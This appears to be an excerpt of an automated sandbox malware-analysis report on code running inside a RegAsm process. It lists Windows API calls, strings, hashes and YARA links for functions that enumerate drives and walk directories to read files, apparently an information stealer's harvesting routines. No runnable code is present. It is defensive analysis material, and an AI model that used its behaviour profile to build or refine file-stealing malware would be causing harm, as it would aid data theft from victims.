Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtualmemset$CreateRead
String ID: uB
API String ID: 619895632-782973331
Opcode ID: af382c12e53ad5d1d33c6f26c18fe3b86c6a18c4671d6da0d54432f036fff8f5
Instruction ID: 6c559d5fe4fcbbb6b085048609ca1b26e6cc6ecef0e9b118bbacc5f28972ce28
Opcode Fuzzy Hash: af382c12e53ad5d1d33c6f26c18fe3b86c6a18c4671d6da0d54432f036fff8f5
Instruction Fuzzy Hash: 91412671A00208AFDB219F95CC45FAEBBB8FF48705F044039FA05E65A1D778AA55CB28

Function 1B4FD9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 1B4FDA9B, 1B4FDDFE
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4FDACC, 1B4FDE2F
%s at line %d of [%.10s], xrefs: 1B4FDADB, 1B4FDE3E
misuse, xrefs: 1B4FDAD6, 1B4FDE39
API called with finalized prepared statement, xrefs: 1B4FDAB0, 1B4FDE13

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 601cdd04731c6b955d5b09945cf25ab9906b55b6086c60258dbd1320aa4542a7
Instruction ID: 57b962e3afcf4d53c67c318b405a3376da1a6b35b4a636bb1b13546cac8e7b93
Opcode Fuzzy Hash: 601cdd04731c6b955d5b09945cf25ab9906b55b6086c60258dbd1320aa4542a7
Instruction Fuzzy Hash: 8612F4B4D007419BE7208F29CC45BD777E8AF45719F04862CE8EA87342E776E549CBA2

Function 1B3FB400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

DESC, xrefs: 1B3FB656, 1B3FB65E, 1B3FB67D, 1B3FB685
ASC, xrefs: 1B3FB651, 1B3FB678
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 1B3FB696
SELECT %s ORDER BY rowid %s, xrefs: 1B3FB665

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: 8e683cede84dd91cae00e8288bef7eb85bbb37adf7976791bb5ae026b5dd4120
Instruction ID: 16625af63e85f4ca4c94977e9378ea88918ad35c3c4167c5899623444513abe7
Opcode Fuzzy Hash: 8e683cede84dd91cae00e8288bef7eb85bbb37adf7976791bb5ae026b5dd4120
Instruction Fuzzy Hash: 13C154B59007419BDB158F24D8417E6B7E1FF88310F544A2EE8CACA640F73AF969C762

Function 00416B24 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416B29
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416B8B
memset.MSVCRT ref: 00416BAA
GetDriveTypeA.KERNEL32(?), ref: 00416BB3
lstrcpy.KERNEL32(?,00000000), ref: 00416BD3
lstrcpy.KERNEL32(?,00000000), ref: 00416BF1

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 004166D7: _EH_prolog.MSVCRT ref: 004166DC
Part of subcall function 004166D7: wsprintfA.USER32 ref: 00416702
Part of subcall function 004166D7: FindFirstFileA.KERNEL32(?,?), ref: 00416719
Part of subcall function 004166D7: memset.MSVCRT ref: 00416730
Part of subcall function 004166D7: memset.MSVCRT ref: 0041673E
Part of subcall function 004166D7: StrCmpCA.SHLWAPI(?,00427920), ref: 0041675C
Part of subcall function 004166D7: StrCmpCA.SHLWAPI(?,00427924), ref: 00416776
Part of subcall function 004166D7: wsprintfA.USER32 ref: 0041679A
Part of subcall function 004166D7: StrCmpCA.SHLWAPI(?,004276D6), ref: 004167AB
Part of subcall function 004166D7: wsprintfA.USER32 ref: 004167D1
Part of subcall function 004166D7: memset.MSVCRT ref: 004167F7
Part of subcall function 004166D7: lstrcat.KERNEL32(?,?), ref: 00416809
Part of subcall function 004166D7: strtok_s.MSVCRT ref: 00416842
Part of subcall function 004166D7: memset.MSVCRT ref: 00416857
Part of subcall function 004166D7: lstrcat.KERNEL32(?,?), ref: 0041686C

lstrcpy.KERNEL32(?,00000000), ref: 00416C14
lstrlenA.KERNEL32(?), ref: 00416C79

Strings

*%DRIVE_REMOVABLE%*, xrefs: 00416B60
%DRIVE_FIXED%, xrefs: 00416BF8
%DRIVE_REMOVABLE%, xrefs: 00416BDA
*%DRIVE_FIXED%*, xrefs: 00416B3D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 2879972474-147700698
Opcode ID: 1946b8157482b0deb2819915d5b4e5c61444dadc2fcc5ddd2c3e55a54c9afd99
Instruction ID: ca762a095bca1741843f610a79c4855fb9e34e02bd832410d481ff154992d589
Opcode Fuzzy Hash: 1946b8157482b0deb2819915d5b4e5c61444dadc2fcc5ddd2c3e55a54c9afd99
Instruction Fuzzy Hash: 8D5190B1904259ABDB30AF71DC86EEF7B6CEF05344F10001BB62592092DF38AA85CB59

Function 1B44DB10 Relevance: 18.3, APIs: 12, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dab2fd30dc12b3a7cefe3528bee6bcb9342493bb1ea549d35021bfc2176b09
Instruction ID: b07f18fb24534f5e13fb913a519a32dbaa957eaee6572869c10ad71b6f661821
Opcode Fuzzy Hash: 35dab2fd30dc12b3a7cefe3528bee6bcb9342493bb1ea549d35021bfc2176b09
Instruction Fuzzy Hash: 2C81D2B6604301ABEB10DF68CC81BABB3E9EF84714F54482DF9C597350E675ED218B92

Function 0040B4C3 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 431filestringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B4C8
wsprintfA.USER32 ref: 0040B4F1
FindFirstFileA.KERNEL32(?,?), ref: 0040B508
StrCmpCA.SHLWAPI(?,00426F6C), ref: 0040B525
StrCmpCA.SHLWAPI(?,00426F70), ref: 0040B53F

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

lstrlenA.KERNEL32(00000000,00426CAE,00000000,?,?,?,00426F74,?,?,00426CAB), ref: 0040B5EF

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

FindNextFileA.KERNEL32(00000000,?), ref: 0040BA86
FindClose.KERNEL32(00000000), ref: 0040BA95

Strings

#, xrefs: 0040BA3F
%s\*.*, xrefs: 0040B4EB

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitwsprintf
String ID: #$%s\*.*
API String ID: 1095930517-2760317471
Opcode ID: fe1ac8bbd09059259a17e9b54544d9c5ad02b8e005e27b913791702e203df4b0
Instruction ID: f28828af1c0ccbd4ea271cfd099dc3199461975920aa2154fd34867029b7b7fe
Opcode Fuzzy Hash: fe1ac8bbd09059259a17e9b54544d9c5ad02b8e005e27b913791702e203df4b0
Instruction Fuzzy Hash: 7C02857180024CEADF15EBA5C955BDEBB78AF15304F00409EE549A3182DFB817C9DFA6

Function 1B44DFC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%lld %lld, xrefs: 1B44E055

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %lld %lld
API String ID: 0-3794783949
Opcode ID: 9f6fefcacfb80a1b12d21bf9bf222046af11b797294aac028374f7ad23ec8bf2
Instruction ID: f448204f872f7c59d2d76ffbbeb2f62cd5a0e7a44ea7718d749540d49497582f
Opcode Fuzzy Hash: 9f6fefcacfb80a1b12d21bf9bf222046af11b797294aac028374f7ad23ec8bf2
Instruction Fuzzy Hash: A23115B66047007BFA255B29CC02FEBB7AEDFC4711F508418F69093251E672E8218762

Function 1B4F14D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 360COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 1B4F1571
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4F15A2
%s at line %d of [%.10s], xrefs: 1B4F15B1
misuse, xrefs: 1B4F15AC
API called with finalized prepared statement, xrefs: 1B4F1586

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 16297f3e91160c3e30bec91f07e7154e6be94b5fb4f266e39c3d8a9a9907543c
Instruction ID: 52b5feda412f7e96dbc56c2b9c5c0d1e2d9fa5a5bf90c63e2d8b50b0f0b17523
Opcode Fuzzy Hash: 16297f3e91160c3e30bec91f07e7154e6be94b5fb4f266e39c3d8a9a9907543c
Instruction Fuzzy Hash: 9AC1F4B5D007419BEB208F2EDC45BD777E9AF42314F04852DE88A8B341E776E449CBA2

Function 1B4FD4F0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 310COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 1B4FD5AC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4FD5DD
%s at line %d of [%.10s], xrefs: 1B4FD5EC
misuse, xrefs: 1B4FD5E7
API called with finalized prepared statement, xrefs: 1B4FD5C1

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: a71d440e22e0a1a970878a5a93b05f7be980b67e3ef9409fde7a1895169ea398
Instruction ID: 11fa74cdf9d1286e348524e3e2a4de20a2a66509c22a74d2e65ffcebfee02f7c
Opcode Fuzzy Hash: a71d440e22e0a1a970878a5a93b05f7be980b67e3ef9409fde7a1895169ea398
Instruction Fuzzy Hash: E2B1A1B59047419FEB109F28D885BD7B7E4BF45318F04852CE8EA8B341E776E449CBA2

Function 0040A025 Relevance: 15.3, APIs: 10, Instructions: 301fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A02A

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426EA4,?,?,00426C7E,?), ref: 0040A0A7
StrCmpCA.SHLWAPI(?,00426EA8), ref: 0040A0C4
StrCmpCA.SHLWAPI(?,00426EAC), ref: 0040A0DE
StrCmpCA.SHLWAPI(?,00000000,?,?,?,00426EB0,?,?,00426C7F), ref: 0040A175
StrCmpCA.SHLWAPI(?), ref: 0040A1F6

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00409299: _EH_prolog.MSVCRT ref: 0040929E

FindNextFileA.KERNEL32(00000000,?), ref: 0040A3DF
FindClose.KERNEL32(00000000), ref: 0040A3EE

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 2015904956-0
Opcode ID: cc20da37344adfd7e400e46a963e30c362ea34b8211644ba2100470c741c360a
Instruction ID: a706eb3d8b744626e06bcff9738a858bbfee5948ba444621fe06d21f20135732
Opcode Fuzzy Hash: cc20da37344adfd7e400e46a963e30c362ea34b8211644ba2100470c741c360a
Instruction Fuzzy Hash: EEC18370D00248EACF10EBB5D9567DE7FB8AF19304F10415EE845A3281DBB85798DBA7

Function 0040A440 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 441fileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040A445

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00426C82,00000000,75B0AC90), ref: 0040A4A4
StrCmpCA.SHLWAPI(?,00426EBC), ref: 0040A4C1
StrCmpCA.SHLWAPI(?,00426EC0), ref: 0040A4DB

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

FindNextFileA.KERNEL32(00000000,?), ref: 0040AA47
FindClose.KERNEL32(00000000), ref: 0040AA56

Strings

", xrefs: 0040A9CA
\*.*, xrefs: 0040A466

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
